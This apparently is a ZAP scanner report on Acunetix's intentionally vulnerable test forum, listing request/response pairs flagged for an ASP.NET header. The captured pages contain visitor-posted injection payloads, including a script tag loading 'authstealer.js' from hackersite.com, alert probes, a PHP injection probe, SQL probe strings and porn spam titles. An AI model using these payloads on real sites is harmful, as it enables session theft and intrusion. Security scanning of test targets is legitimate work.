Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:45:52 GMT Accept-Ranges: bytes ETag: "3629faa394d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 13 |
| Response Body - size: 13 bytes. |
User-agent: *
|
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' 